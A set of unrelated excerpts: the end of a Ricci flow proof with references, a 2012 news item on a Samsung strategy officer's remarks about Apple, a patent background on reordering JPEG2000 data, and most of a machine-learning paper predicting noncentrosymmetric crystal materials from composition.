that $y$ lies in the unbounded part of $M \setminus S$. However, by [@poincare Lem 2.20], this $10 \epsilon$-neck separates $y$ from the unique end of $M$, contradicting the fact that it is contained in the unbounded component of $M \setminus S$. It is a fact from the theory [@poincare Cor 2.21] of noncompact manifolds of positive curvature that there exists $\bar{C} = \bar{C}(\epsilon) < \infty$ universal with the following property: for any $\epsilon$-neck centered at $z_1$ whose center sphere separates $y$ from another $\epsilon$-neck centered at $z_2$, we have $R(z_2, t_k) \leq \bar{C} R(z_1, t_k)$. Note that, in the statement of $\cite[Cor 2.21]{poincare}$, it is required that the $\epsilon$-necks are disjoint from $y$, but since $y$ lies outside of the middle two-thirds of any $\epsilon$-neck, $y$ is disjoint from the $2\epsilon$-necks centered at $z_1$ and $z_2$, so we may apply the theorem by replacing $\epsilon$ with $2\epsilon$. We apply this with $z_2 = p$, and with $z_1$ any point of $\partial K(t_k)$, so that $R(z_1, t_k) \leq C R(x_k, t_k)$. Combining this with Theorem 1 gives $$R(p, t_k) \leq \bar{C} C R(x_k, t_k)$$ for all $k$, contradicting the above inequality.\ **Case 3:** $$\liminf_{t \to -\infty} \dfrac{d_t(p, K(t))}{\sqrt{|t|}} = \infty , \hspace{6 mm} \liminf_{t \to -\infty}\inf_{x \in K(t)} |t|R(x, t) \geq b > 0 .$$ In this case we also have $$\liminf_{t \to -\infty} \inf_{x \in K(t)} R(x, t)d_t^2(x, p) = \infty.$$ Fix $t_0 < 0$ such that $p$ is the center of an evolving $\epsilon$-neck based at $(p, t)$ and such that $|t|R(x, t) \geq \frac{1}{2}b$ for all $t \leq t_0$, $x \in K(t)$. Then for $t \leq t_0$ we have $$\mbox{diam}_{g(t)}(K(t)) \leq D (2|t|/b)^{\frac{1}{2}}.$$ Recall the distortion constant $C' = C'(C)<\infty$ from Lemma 3, the constant $c = c(p) >0$ from Lemma 2, and the Elliptic-type constant $A< \infty$ from Lemma 1. By assumption, we may choose $t_1 \leq t_0$ such that $$C^* := \dfrac{d_{t_1}(p, K(t_1))}{\sqrt{|t_1|}} \geq 100,000((D+ A + 1)b^{-\frac{1}{2}} + C') \hspace{6 mm} \mbox{ and }$$ $$\dfrac{d_{25t_1}(p, K(25|t_1|))}{\sqrt{25|t_1|}} \geq C^* .$$ Set $t_2 := 25t_1$, and let $x_i \in K(t_i)$ be a soul of $(M, g(t_i))$. Then $$d_{t_2}(x_2, p) \geq 5C^* \sqrt{|t_1|},$$ $$d_{t_2}(x_2, x_1) \geq 5C^*\sqrt{|t_1|} - (C^* \sqrt{|t_1|} + 5C'\sqrt{|t_1|} + 2Db^{-\frac{1}{2}}|t_1|^{\frac{1}{2}}) \geq (3.99)C^*\sqrt{|t_1|} .$$ We claim that the center sphere $S(p)$ of the $\epsilon$-neck centered at $p$ separates $x_2$ from $x_1$. In fact, since $x_1$ lies outside the center two-thirds of the $\epsilon$-neck $N$ centered at $p$, [@poincare Lem A.9] implies that $S:= \partial B(x_1, R(p, t_1)^{-\frac{1}{2}} + d(x_1, p)) \cap N$ lies on the unbounded component of the complement of the center sphere $S(p)$ of $N$. Note that $R(p, t_1)^{-\frac{1}{2}} \leq c^{-\frac{1}{2}}|t_1|^{\frac{1}{2}}$. Since level sets for $d(x_1, \cdot)$ are connected [@poincare p.27], and $S$ is in the middle two-thirds of an $\epsilon$-neck, we must have $S = \partial B(x_1, R(p, t_1)^{-\frac{1}{2}} + d(x_1, p))$. Because $$d_{t_1}(x_1, x_2) \geq (4.99)C^* |t_1|^{\frac{1}{2}} \geq c^{-\frac{1}{2}}|t_1|^{\frac{1}{2}} + (C^* + Db^{-\frac{1}{2}})|t_1|^{\frac{1}{2}} + 3C^*|t_1|^{\frac{1}{2}} > R(p, t_1)^{-\frac{1}{2}} + d(x_1, p) + 3C^* |t_1|^{\frac{1}{2}},$$ so any minimal $g(t_1)$-geodesic from $x_1$ to $x_2$ must leave $B(x_1, d(x_1, p) + R(p, t_1)^{-\frac{1}{2}})$, hence it must leave the bounded component of $M \setminus S(p)$. In particular, $x_2$ is in the unbounded component of $M \setminus S(p)$. We can take $\epsilon$ small enough so that $\epsilon^{-1} C^{-1} > 25$, so that $$\epsilon^{-1}R(y, t_1)^{-1} \geq \epsilon^{-1}C^{-1}|t_1| > 25|t_1| .$$ This means that $N \times \{t_2\}$ is a time slice of an evolving $\epsilon$-neck defined on a time interval containing $[t_2, t_1]$. In particular, $S(p)$ separates $x_2$ from the unique end of $M$ (again by [@poincare Lem 2.20]), so $x_2$ is in the bounded component of $M \setminus S(p)$, a contradiction. $\qed$ [20]{} Morgan, John W., and Tian, Gang. Ricci Flow and the Poincare Conjecture. Providence, RI: American Mathematical Society, 2007. Print. Cao, Xiaodong, and Zhang, Qi. “The Conjugate Heat Equation and Ancient Solutions of the Ricci Flow.” Advances in Mathematics 228.5 (2011): 2891-919. Web. Cao, X. Chow, B., Zhang, Y.: Three-Dimensional Noncompact $\kappa$-Solutions that are Type-I Forward and Backward. https://arxiv.org/abs/1606.02698 Ding, Y.: A Remark on Degenerate Singularities in Three Dimensional Ricci Flow, Pacific Journal of Mathematics, vol. 240, no. 2, Apr. 2009, pp. 289-308. Kleiner, Bruce, and John Lott. “Notes on Perelman’s Papers.” Geometry & Topology, vol. 12, no.5, June 2008, pp. 2587-2855 Kleiner, Bruce, and John Lott. “Singular Ricci Flows I.” 29 July 2015, arxiv.org/abs/1408.2271 Naber, Aaron. “Noncompact Shrinking Four Solitons with Nonnegative Curvature.” Journal fur Die Reine Und Angewandte Mathematik (Crelles Journal), vol. 2010, no.645, 2010. Ni, Lei. “Closed type I ancient solutions to Ricci flow”. Recent advances in geometric analysis, 147-150, Adv. Lect. Math (ALM) , 11, Int. Press, Somerville, MA, 2010. Perelman, Grisha. “The Entropy Formula for Ricci Flow and its Geometric Applications.” Nov. 2002, arxiv.org/abs/math/0211159 Zhang, Yongjia. “On Three-Dimensional Type I $\kappa$-Solutions to the Ricci Flow.” 8 Aug. 2017, arxiv.org/abs/1708.02341.
Monday, December 17, 2012 Young Shon, newly appointed CSO (Chief Strategy Officer) of Samsung, was interviewed a few days ago by MIT Technology Review to discuss his new role. However, not all were questions about Samsung, but some also pointed to Apple, questions to which the CSO of Samsung responded very interesting statements. While talking to the interviewer about the competition between Apple and Samsung, Shon said the force could not be in Apple products, but in some of the online services that keep their users as iCloud or iTunes. And anecdotally ... This is what she told the interviewer when he noticed his mobile phone:"Look at your phone (the Samsung Galaxy Nexus noting interviewer).It is a better phone, from my point of view.It has a better screen.It's faster. Yet how imagine how finished your answer? "At work I use Samsung devices, home of Apple.Mainly because all my systems and files are compatible with those devices.A bit complicated, is not it? ". And it turned out to be some statements that have not left anyone indifferent, considering that now is the new executive responsible for the strategy of Samsung.
1. Field of the Invention The present invention relates to an image compression data processing method and an image compression data processing apparatus that divide compressed image data into multiple pieces of compressed partial image data and are capable of describing the multiple pieces of compressed partial image data in an arbitrary order. 2. Description of the Related Art When compressed image data is to be distributed from a sending side device (server) to a receiving side device (client), for example, sub-band encoding such as specified in JPEG2000 is first applied to the DCT blocks of the image data as disclosed in Patent Document 1. Here, DCT is an abbreviation for Discrete Cosine Transform and JPEG is an abbreviation for the Joint Photographic Experts Group. Then, based on a specified order of reading relating to at least one of appearance definition (designation of region) or a spatial frequency band provided from the receiving side device, the sending side device reorders the data and distributes the reordered data. The receiving side device then decodes and displays or otherwise handles the data. Patent Document 2 discloses a technique which uses JPEG2000 to determine a Region of Interest (ROI) in advance and to reorder compressed image data with priority being given to the ROI of an image hit in a keyword search or a search for an image feature amount (similar image retrieval), and then the compressed image data is distributed. [Patent Document 1] Japanese Patent Application Laid-Open No. 5-290093 [Patent Document 2] Japanese Patent Application Laid-Open No. 2001-160062
--- abstract: 'Noncentrosymmetric materials play a critical role in many important applications such as laser technology, communication systems,quantum computing, cybersecurity, and etc. However, the experimental discovery of new noncentrosymmetric materials is extremely difficult. Here we present a machine learning model that could predict whether the composition of a potential crystalline structure would be centrosymmetric or not. By evaluating a diverse set of composition features calculated using matminer featurizer package coupled with different machine learning algorithms, we find that Random Forest Classifiers give the best performance for noncentrosymmetric material prediction, reaching an accuracy of 84.8% when evaluated with 10 fold cross-validation on the dataset with 82,506 samples extracted from Materials Project. A random forest model trained with materials with only 3 elements gives even higher accuracy of 86.9%. We apply our ML model to screen potential noncentrosymmetric materials from 2,000,000 hypothetical materials generated by our inverse design engine and report the top 20 candidate noncentrosymmetric materials with 2 to 4 elements and top 20 borate candidates.' author: - | Yuqi Song, Joseph Lindsay, Yong Zhao,Alireza Nasiri,Steph-Yves Loius\ Department of Computer Science and Engineering\ University of South Carolina\ Columbia, SC, 29201\ Jie Ling\ Department of Chemistry and Biochemistry\ Claflin University\ Orangeburg, SC, 29115\ Ming Hu\ Department of Mechanical Engineering\ University of South Carolina\ Columbia, SC, 29201\ Jianjun Hu \*\ Department of Computer Science and Engineering\ University of South Carolina\ Columbia, SC, 29201\ \* Correspondence author: `jianjunh@cse.sc.edu` title: Machine Learning based prediction of noncentrosymmetric crystal materials --- Introduction ============ Nonlinear optical materials (NLO), in which light waves interact with each other, are one of the key enablers for next generation of new lasers, fast telecommunication, quantum computing, quantum encryption, dynamic or optical storage data, and many other applications [@ok2006bulk; @halasyamani1998noncentrosymmetric; @kohn1999nobel; @abdeldayem07]. NLO materials are most broadly defined as those compounds capable of altering the frequency of light. Depending on the chemical and physical construct of the materials they can combine multiple photons to generate shorter wavelength photons or split one photon into several new photons of longer wavelengths. These new photons can be employed to perform all of the above applications as well as many others. The classes of NLO materials range broadly from inorganic oxides such as $KTiOPO_{4}$ and $LiNbO_{3}$ to semiconductors like to periodically poled GaAs, to organic polymers to metal organic framework (MOFs), and to simple small organic molecules like stilbene. This broad range of materials has many different properties and characteristics but all are united by one common factor, i.e. their lattice structure must not contain a center of symmetry and must be acentric [@ok2006bulk; @halasyamani1998noncentrosymmetric]. This is a rigorous requirement that can only be met in well-ordered lattice structures, meaning ordered crystals. It is generally difficult to design and grow acentric single crystals and less than 15% of all known structures are acentric. This demands exceptional determination on the part of the synthetic and crystal growth experimentalists. The process is made even more difficult by the fact that the NLO processes that enable frequency modification are inherently inefficient. Moreover, the ability to prepare new NLO materials and study their properties is not trivial and requires patient and detailed investigations. The payoff is enormous however, as the materials enable the development of devices used in next generation laser surgery, imaging, optical communication, advanced spectroscopy, optical data storage and a vast array of applications dependent on the interaction of light with matter. In Figure \[example\], We show the crystal structures of a centrosymmetric material and a noncentrosymmetric material, namely ScBO3 and SrB12O7. [.45]{} ![Crystal Structures of centrosymmetric and noncentrosymmetric materials. (a) The crystal structures of ScBO3 of space group R$\overline{3}$c, where the purple nodes represent Sc atoms, the green nodes represent B atoms and red nodes are O atoms. (b) The crystal structure of SrB12O7 of space group R3, where the blue node represents Sr atom, the green nodes represent B atoms, and the red nodes are O atoms.[]{data-label="example"}](figures/fig1.png "fig:"){width="\textwidth"} [.45]{} ![Crystal Structures of centrosymmetric and noncentrosymmetric materials. (a) The crystal structures of ScBO3 of space group R$\overline{3}$c, where the purple nodes represent Sc atoms, the green nodes represent B atoms and red nodes are O atoms. (b) The crystal structure of SrB12O7 of space group R3, where the blue node represents Sr atom, the green nodes represent B atoms, and the red nodes are O atoms.[]{data-label="example"}](figures/fig2.png "fig:"){width="\textwidth"} Although the structure-property relation between NLO effects and microstructure can be used as a guide, new NLO crystals are still mainly explored using “trial and error” Edisonian approaches. A reliable determination of lattice symmetry is a crucial first step for materials characterization and analytics. Recently, a deep learning-based approach to automatically classify structures given a crystal structure (even with defects) has been recently proposed [@ziletti2018insightful]. Similarly, Kaufmann et. al. [@kaufmann2020crystal] proposed a crystal symmetry determination method from electron diffraction using machine learning. However, these methods cannot be applied for large-scale composition based screening as they both require experimental data. On the other hand, direct numerical calculation of the optical properties of a single crystalline material from its atomic structure by accurate first-principles without any other inputs has just been made available for a few years. Studies have focused on properties such as second harmonic generation (SHG) coefficients [@diatta2018density] and other important optical properties such as energy band gap, refractive indices [@dec2018dft], and birefringence. While first-principles calculations make it possible to predict some optical properties without any experimental data, such computation is usually tedious and very computationally demanding even for not too complicated primitive cells. Consider this: four-element compounds with different ratios can lead to a search space of 32.4 billion combinations. Currently, Density Functional Theory (DFT) based first-principles methods for optical properties calculation is out of the question for high-throughput screening of NLO materials. Especially, these methods cannot be used for discovery of new NLO materials as they all require the knowledge of the crystal structure information which is usually not available and computational prediction of crystal structures from composition is feasible only for a small subset of materials with simple compositions [@oganov2019structure]. In-depth understandings of the mechanism on how compositions form specific structures which further determines the NLO behavior would provide the guide for experimental explorations, and save enormous human and materials resources. On the other hand, data driven computational prediction models for noncentrosymmetric materials discovery can be used as the first step for nonlinear optical materials discovery. In the past five years, machine learning (ML) has been increasingly applied to materials informatics problems from property prediction [@cao2019convolutional; @hamidieh18], to materials structure prediction, to computational screening [@choudhary2019accelerated], and inverse materials design [@sanchez2018inverse; @dan2019generative]. Among these ML algorithms and models, Random Forest (RF) models have shown great success for predicting a variety of materials properties such as the critical temperatures of superconducting materials [@stanev17; @matsu19] and for predicting the ability of a given composition to form an amorphous ribbon of metallic glass via melt spinning [@ward16; @ward2018machine]. In [@furmanchuk2016predictive], Furmanchuk et al. utilized a RF regression model to predict the bulk modulus. RF models have also been widely used in other research areas. For example, a RF based approach showed its superiority in automatically selecting molecular descriptors for ligands of kinases and nuclear hormone receptors [@cano2017automatic]. On the other hand, recent years have observed tremendous success of deep learning [@goodfellow2016deep] based neural network models in applications such as image recognition, automatic machine translation, robotics [@su2020dietary], and autonomous driving [@liu2017survey]. More importantly, their success in materials discovery problems such as the prediction of crystal stability [@ye2017crystal] and superconductor critical temperatures [@li2020critical], makes it promising for other applications in materials discovery. In our previous work, we have applied machine learning and deep learning for crystal space group and crystal system prediction from composition [@zhao2020machine] and for formation energy prediction [@cao2019convolutional]. Herein, we propose and evaluate two machine learning models including RF and multi-layer perceptron (MLP) neural network models for noncentrosymmetric classification given only material composition. The Magpie composition descriptors are used in our study. Cross-validation and hold-out experiments show that RF with Magpie features achieved the best results. A further application of our RF noncentrosymmetric prediction model to screening two million hypothetical materials generated by our generative ML model [@dan2019generative] allows us to identify and predict dozens of potential novel noncentrosymmetric materials with high confidence scores. Our contributions can be summarized as follows: \(1) We propose two machine learning algorithms (RF and MLP) for predicting noncentrosymmetric materials given only their composition. \(2) We evaluate and compare the performances of different machine learning algorithms for noncentrosymmetric materials classification. \(3) We apply our prediction models to screen the 2 million hypothetical materials generated by a generative adversarial network (GAN) based predictors and identify a list of top candidate materials with highly probable noncentrosymmetry structures. Materials and Methods ===================== Feature Calculation ------------------- To accomplish the goal of noncentrosymmetry classification, one of the key steps is to identify the most relevant features of a chemical composition that correlates with symmetry tendency of its formed structure. To do this, we have tried the myriad of featurizers provided by the matminer library [@ward2018matminer], which is a Python-based software platform to facilitate data-driven methods of analyzing and predicting materials properties, such as composition, crystal structure, band structure, and more. The matminer featurizers package has a total of 5 different classes of featurizers present in the library’s current deployment, ranging from composition descriptors to structural ones. We use the composition featurizer’s Element Property module to calculate the Magpie elemental descriptors for training our ML models. The Magpie feature set has 132 elemental descriptors [@ward2018machine], composed of 6 statistics of a set of elemental properties such as atomic number in the material, space group of the material, the Magnetic Moment calculated by Density Functional Theory (DFT). Magpie feature set was selected based on our evaluations of a couple of descriptors. Machine learning models ----------------------- We evaluate two machine learning models for noncentrosymmetry prediction, namely, a Random Forest (RF) classifier, and a Deep Neural Network (DNN) classifier. Random Forest [@breiman2001random; @liaw2002classification] is a supervised learning method that can be applied to solve classification or regression problems. It is an ensemble algorithm that constructs a multitude of many decision trees at training time and outputs the class that is the mode of the classification of the individual trees. RF classifiers have shown strong prediction performance when combined with composition features in our previous studies [@cao19]. In our RF classifier model, we set the number of trees to be 200. This algorithm was implemented using the Scikit-Learn library in Python 3.6. Deep learning excels at identifying patterns in unstructured data by building multiple layers to progressively extract higher-level features from the raw input to do the predictive task [@sze2017efficient]. For instance, Xie et al. [@xie2018crystal] proposed a graph convolutional neural network model for property predictions of materials and provided a universal and interpretable representation of crystalline materials. In this paper, we aimed to explore whether DNNs can achieve better predictive performance than RF models in noncentrosymmetry prediction. Therefore, we designed a MLP neural network classifier made of five fully connected layers, with four layers using LeakyReLU as their activation function and Sigmoid in the final layer for classifying. A dropout layer with a 0.05 drop rate was added to avoid overfitting. An Adam optimizer and binary cross entropy function are selected for training the DNN. In addition, the epoch, batch and learning rate are set to 50, 500, 0.001, respectively. Hyper-parameter tuning ---------------------- Due to various hyperparameters and the impact of their combinations on the training process and the final performance of machine learning models, manual parameter tuning is time-consuming. Hence, automatic hyperparameter tuning method is needed for finding suitable parameters. To ensure fair comparison of the ML models, we use the Bayesian optimization [@snoek2012practical] algorithm to find optimal hyper-parameters for RF models, which has been proven to be an effective tool. This method requires that the objective be a scalar value depending on the hyperparamter configuration $x$, where the maximum is sought for an expensive function $ f: \mathcal{X} \rightarrow \mathbb{R}.$ $$\mathbf{x}_{o p t}=\underset{\mathbf{x} \in \mathcal{X}}{\arg \max } f(\mathbf{x})$$ We use the hyperopt package library [@bergstra2013hyperopt] to optimize n\_estimators, max\_depth and max\_features in RF models by supplying an optimization function which maximizes its precision. Results and Discussion ====================== Herein, we describe the datasets, the evaluation criteria, and the experimental results. We analyze and compare the prediction performance of RF and DNN models. Besides, we discuss the application of our model to screening new hypothetical noncentrosymmetric materials. Our experiments on classifying noncentrosymmetry from composition include three parts: cross-validation experiments, holdout experiments on Borates, and screening a two million hypothetical materials. Datasets -------- Crystal structures with different space groups have different centrosymmetric tendencies. It is known that there are 138 noncentrosymmetric space groups and 92 centrosymmetric space groups, the detailed space group IDs and names and their centrosymmetric property are summarized in Table \[table:Space group\]. **** **group IDs** **group names** ----------------------- --------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- centrosymmetric 2, 10-15, 47-74, 83-88, 123-142, 147-148, 162-167, 175-176, 191-194, 200-206, 221-230 P$\overline{1}$, P2/m, P2~1~/m, C2/m, P2/c, P2~1~/c, C2/c, Pmmm, Pnnn, Pccm, Pban, Pmma, Pnna, Pmna, Pcca, Pbam, Pccn, Pbcm, Pnnm, Pmmn, Pbcn, Pbca, Pnma, Cmcm, Cmca, Cmmm, Cccm, Cmma, Ccca, Fmmm, Fddd, Immm, Ibam, Ibca, Imma, P4/m, P4~2~/m, P4/n, P4~2~/n, I4/m, I4~1~/a, P4/mmm, P4/mcc, P4/nbm, P4/nnc, P4/mbm, P4/mnc, P4/nmm, P4/ncc, P4~2~/mmc, P4~2~/mcm, P4~2~/nbc, P4~2~/nnm, P4~2~/mbc, P4~2~/mnm, P4~2~/nmc, P4~2~/ncm, I4/mmm, I4/mcm, I4~1~/amd, I4~1~/acd, P$\overline{3}$, R$\overline{3}$, P$\overline{3}$1m, P$\overline{3}$1c, P$\overline{3}$m1, P$\overline{3}$c1, R$\overline{3}$m, R$\overline{3}$c, P6/m, P6~3~/m, P6/mmm, P6/mcc, P6~3~/mcm, P6~3~/mmc, Pm$\overline{3}$, Pn$\overline{3}$, Fm$\overline{3}$, Fd$\overline{3}$, Im$\overline{3}$, Pa$\overline{3}$, Ia$\overline{3}$, Pm$\overline{3}$m, Pn$\overline{3}$n, Pm$\overline{3}$n, Pn$\overline{3}$m, Fm$\overline{3}$m, Fm$\overline{3}$c, Fd$\overline{3}$m, Fd$\overline{3}$c, Im$\overline{3}$m, Ia$\overline{3}$d noncentrosymmetric 1, 3-9, 16-46, 75-82, 89-122, 143-146, 149-161, 168-174, 177-190, 195-199, 207-220 P1, P2, P2~1~, C2, Pm, Pc, Cm, Cc, P222, P222~1~, P2~1~2~1~2, P2~1~2~1~2~1~, C222~1~, C222, F222, I222, I2~1~2~1~2~1~, Pmm2, Pmc2~1~, Pcc2, Pma2, Pca2~1~, Pnc2, Pmn2~1~, Pba2, Pna2~1~, Pnn2, Cmm2, Cmc2~1~, Ccc2, Amm2, Aem2, Ama2, Aea2, Fmm2, Fdd2, Imm2, Iba2, Ima2, P4, P4~1~, P4~2~, P4~3~, I4, I4~1~, P$\overline{4}$, I$\overline{4}$, P422, P42~1~2, P4~1~22, P4~1~2~1~2, P4~2~22, P4~2~2~1~2, P4~3~22, P4~3~2~1~2, I422, I4~1~22, P4mm, P4bm, P4~2~cm, P4~2~nm, P4cc, P4nc, P4~2~mc, P4~2~bc, I4mm, I4cm, I4~1~md, I4~1~cd, P$\overline{4}$2m, P$\overline{4}$2c, P$\overline{4}$2~1~m, P$\overline{4}$2~1~c, P$\overline{4}$m2, P$\overline{4}$c2, P$\overline{4}$b2, P$\overline{4}$n2, I$\overline{4}$m2, I$\overline{4}$c2, I$\overline{4}$2m, I$\overline{4}$2d, P3, P3~1~, P3~2~, R3, P312, P321, P3~1~12, P3~1~21, P3~2~12, P3~2~21, R32, P3m1, P31m, P3c1, P31c, R3m, R3c, P6, P6~1~, P6~5~, P6~2~, P6~4~, P6~3~, P$\overline{6}$, P622, P6~1~22, P6~5~22, P6~2~22, P6~4~22, P6~3~22, P6mm, P6cc, P6~3~cm, P6~3~mc, P$\overline{6}$m2, P$\overline{6}$c2, P$\overline{6}$2m, P$\overline{6}$2c, P23, F23, I23, P2~1~3, I2~1~3, P432, P4~2~32, F432, F4~1~32, I432, P4~3~32, P4~1~32, I4~1~32, P$\overline{4}$3m, F$\overline{4}$3m, I$\overline{4}$3m, P$\overline{4}$3n, F$\overline{4}$3c, I$\overline{4}$3d \[table:Space group\] : Space groups with noncentrosymmetric and centrosymmetric structures [.45]{} ![Sample distribution of noncentrosymmetric and centrosymmetric space groups in MPF dataset[]{data-label="distribution of space group"}](figures/fig3.jpg "fig:"){width="\textwidth"} [.45]{} ![Sample distribution of noncentrosymmetric and centrosymmetric space groups in MPF dataset[]{data-label="distribution of space group"}](figures/fig4.jpg "fig:"){width="\textwidth"} We first downloaded the composition formulas of 97,217 crystal materials from the Materials Project database. We then remove those compositions belonging to multiple space groups with conflicting centrosymmetric tendencies. In total, we collecte 82,506 material compositions and assign the noncentrosymmetric property labels according to their corresponding space group. The dataset is called **MPF**, which have 60,587 positive (noncentrosymmetric) samples and 21,919 negative (centrosymmetric) samples, as shown in Table \[table:dataset\]. The distribution of noncentrosymmetric and centrosymmetric space groups in MPF dataset are shown in Figure \[distribution of space group\]. We find that the distribution of samples over different space groups are not well balanced. In order to evaluate the extrapolation prediction performance of our machine learning prediction model of noncentrosymmetry, we select all the 315 borate compounds from MPF dataset and assign them as the hold-out test dataset Borates315. Borates contain boron (B) element and oxygen (O) element, which are a ubiquitous family of flame retardants found as boric acid and as a variety of salts. Previous research found that compared to other material family, borates tend to have higher percentage of nonlinear proprieties, which makes it a good hold-out test set. [@bubnova2017borates]. We further find that most borate materials include 3 elements. It is interesting to see if ML models trained with 3-element training samples can achieve better prediction performance. We select all 3-element materials from the MPF dataset and assigned them to the **MP3** dataset, which includes 30,762 centrosymmetric materials and 8,964 noncentrosymmetric materials as shown in Table \[table:dataset\]. The motivation is to check if our classification models trained with MP3 dataset can achieve better performance when testing on the hold-out borates dataset. **** **\#symmetry** **\#non symmetry** **\#total** ------------------- ---------------- -------------------- ------------- MPF 63,376 19,130 82,506 MP3 30,762 8,964 39,726 Borates315 250 65 315 \[table:dataset\] : Dataset Evaluation criteria ------------------- To evaluate the prediction performance of our model, precision, recall, accuracy, F1 score, and receiver operating characteristic area under the curve (ROC AUC) are used as performance metrics in this study. The formula for these performance metrics are given as follows, where TP is number of true positives, FP is number of false positives, TN is number of true negatives, FN is number of false negatives, TPR is the true positive rate (also referred to as recall) of TP, and FPR refers to false positive rate of FP. $$Precision = \frac{TP}{TP + FP} \label{precison}$$ $$Recall = \frac{TP}{TP + FN} \label{recall}$$ $$Accuracy = \frac{TP + TN}{TP + TN + FP + FN} \label{accuracy}$$ $$F1-score = \frac{2TP}{2TP + FP + FN} \label{f1}$$ $$AUC = \int_{x=0}^{1}TPR(FPR^{-1}(x))dx \label{rocauc}$$ Prediction performance ------------------------ To evaluate how our machine learning models can predict whether a crystal material’s structure is noncentrosymmetry or not, we used two evaluation approaches: one is cross-validation over the MPF dataset and the other is the hold-out evaluation trained with non-borates datasets MPF and MP3 and tested on the Borates315 dataset. This hold-out test is especially important as the cross-validation performance can usually be over-estimated due to the redundancy of the training samples in most of the large-scale datasets such as the Materials Projects and the OQMD [@xiong2020evaluating]. ### 10-fold cross-validation performance We set the maximum tree depth to be 20 and the number of decision trees as 200. This was later expanded to include the minimum number of samples per leaf node, the minimum number of samples required to split a node, and the maximum number of leaf nodes. With these 5 settings tuned per featurizer iteration, we then train the final prediciton RF models and make prediction, and caculate the performance scores. To further verify the performance of our RF-based models, we compare it with those of the DNN-based models. Table \[table:performance\] shows the performances we achieved on two datasets using four evaluation criteria. Model Dataset Precision Recall Accuracy F1 score ----------- --------- ----------- ----------- ----------- ----------- RF-based MPF 0.834 0.754 0.848 0.781 RF-based MP3 **0.845** 0.755 **0.869** **0.786** DNN-based MPF 0.773 0.769 0.785 0.771 DNN-based MP3 0.784 **0.780** 0.792 0.782 : Ten-fold cross-validation performance of ML models for noncentrosymmetry prediction \[table:performance\] Firstly, we found that the precision and accuracy of the RF model are significantly better in comparison with DNN models: the 10 fold cross-validation accuracy of RF model on the MPF dataset is 0.848 compared to 0.785, which indicates 7.89% improvement. The F1 score of RF model is 0.781 compared to 0.771 of DNN. Although DNN achieves better Recall score, the F1-score of RF is higher than DNN’s. This validates the effectiveness of our RF-based model for predicting the noncentrosymmetric property for a given material. This is consistent with a recent evaluation of different ML methods for materials property prediction [@robinson2019validating]. Secondly, comparing the results of the same RF and DNN model on the MPF dataset and the MP3 dataset, we found that each model achieved better prediction performance for the MP3 dataset. Particularly, the precision, accuracy and F1 score of the RF classifier increase to 0.845, 0.869 and 0.786, respectively. ### Hold out experiment results To explore the effectiveness of our model for extrapolative prediction of noncentrosymmetry where the test samples may not have the same distribution with the training set, we conducted a hold-out test over the Borates315 dataset.The training dataset is generated by filtering out all the samples of the Borates315 dataset from the MPF dataset and keeping the remaining ones, which includes 82,191 samples. Similarly, we also conduct a hold-out test for the MP3 dataset for which the training set is generated by removing all borates in the MP3 dataset. The number of samples of the no-borates 3-element training set is 39411. Their ROC curves and AUC scores are shown in Figure \[performance\]. [.45]{} ![ROC curves for cross-validation and hold-out experiments for the RF prediction models trained with the whole dataset and the 3-element dataset.[]{data-label="performance"}](figures/fig5.jpg "fig:"){width="\textwidth"} [.45]{} ![ROC curves for cross-validation and hold-out experiments for the RF prediction models trained with the whole dataset and the 3-element dataset.[]{data-label="performance"}](figures/fig6.jpg "fig:"){width="\textwidth"} [.45]{} ![ROC curves for cross-validation and hold-out experiments for the RF prediction models trained with the whole dataset and the 3-element dataset.[]{data-label="performance"}](figures/fig7.jpg "fig:"){width="\textwidth"} [.45]{} ![ROC curves for cross-validation and hold-out experiments for the RF prediction models trained with the whole dataset and the 3-element dataset.[]{data-label="performance"}](figures/fig8.jpg "fig:"){width="\textwidth"} In Figure \[performance\], each dotted yellow line corresponds to the ROC curve of a random predictor with AUC value of 0.5. Each blue curve represents the ROC curve of the classifier. As is well known the higher value of AUC, the better performance of the classifier. Among the four sub-figures, figure (c) shows the best result, with AUC reaching 0.91. Furthermore, comparing (a) (c) with (b) (d), we can find AUC scores of cross-validation experiments are higher than those of hold-out experiments over the same two datasets, which suggests the over-estimation of model performance due to dataset sample redundancy. Meanwhile, although the performance of hold out experiments is not as good as cross validation experiments, it only uses the non-borate materials as the training data for predicting the 315 borate materials, which interprets the 0.71 and 0.68 AUC are acceptable since this is extrapolation prediction performance. Based on this analysis, we use the RF model to predict and screen hypothetical materials from a large generated materials as discussed in detail in Section 3.4. ### The stability of our model To evaluate the stability of our RF model performance, we made the following Box plot, which shows that the fluctuations of precision and F1 scores for the 10-fold cross-validation experiments are less than 0.01. However, we found that the precision scores of the hold out experiments over the MPF dataset range from 0.61 to 0.67, and the F1 scores are between 0.58 to 0.64. This shows that the prediction performance of our RF models with 10-fold cross-validation experiments are more stable than those of the hold out tests. ![The stability of RF models. (MPF and MP3 are datasets; CV and H are abbreviations of cross validation and hold out; P and F1 represent Precision and F1 score respectively.)[]{data-label="stability"}](figures/fig9.jpg){width="15cm"} ### Feature importance ranking in noncentrosymmetry prediction There are 132 descriptors in the Magpie feature set. To gain further understanding of how different descriptors affect the ML model performance, we calculated the importance scores for all descriptors in the prediction of the RF model and sorted them by their scores. The top 15 descriptors are shown in Figure \[importance\] and the corresponding description of them are presented in Table \[table:importance\]. As can be seen from Figure \[importance\], the importance scores of top 15 features are above 0.014. The top six features have significantly higher scores than the remaining nine features, which shows they make more contributions to predicting the non-centrosymmetry. Combined with Table \[table:importance\], we find that range of atomic number, maximum melting temperature, mean number of valence, range of number of valence, mean number of Ns valence and minimum number of Nd valence are the six most important factors. We also find that the importance of valence number to noncentrosymmetry prediction is consistent with the physical knowledge: first the distribution of valence electrons have strong effect on chemical bond formation (strong covalent bonds or weaker ionic bonds), and thus the final crystal structure formation. Second, previous study [@maki1995surface] shows that the valence electrons of the atoms is involved in its nonlinear optical behavior: they construct the free electron gas, which can be polarized by the oscillating electric field and determine the harmonic excitation frequency by counting linear and nonlinear reflected waves. ![Ranking of top 15 features in terms of their importance scores[]{data-label="importance"}](figures/fig10.jpg){width="8cm"} Feature ID Feature Name Feature Description ---------------------- --------------------------- --------------------------------------------------- 2 